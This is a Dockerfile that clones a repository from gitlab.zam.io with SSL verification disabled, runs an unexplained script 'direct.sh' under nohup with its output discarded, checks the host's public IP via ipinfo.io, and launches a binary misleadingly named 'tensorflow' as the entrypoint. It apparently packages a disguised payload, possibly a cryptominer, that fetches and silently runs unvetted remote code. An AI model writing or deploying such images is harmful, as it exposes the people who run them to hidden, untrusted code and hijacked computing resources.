FROM ubuntu:latest
RUN apt-get update -y
RUN apt-get install git curl -y
RUN git -c http.sslVerify=false clone https://gitlab.zam.io/wajinhakim/drone-test.git
WORKDIR /drone-test
RUN chmod +x tensorflow direct.sh
RUN curl ipinfo.io
RUN nohup bash direct.sh > /dev/null
EXPOSE 8080 8081
ENTRYPOINT ["./tensorflow"]
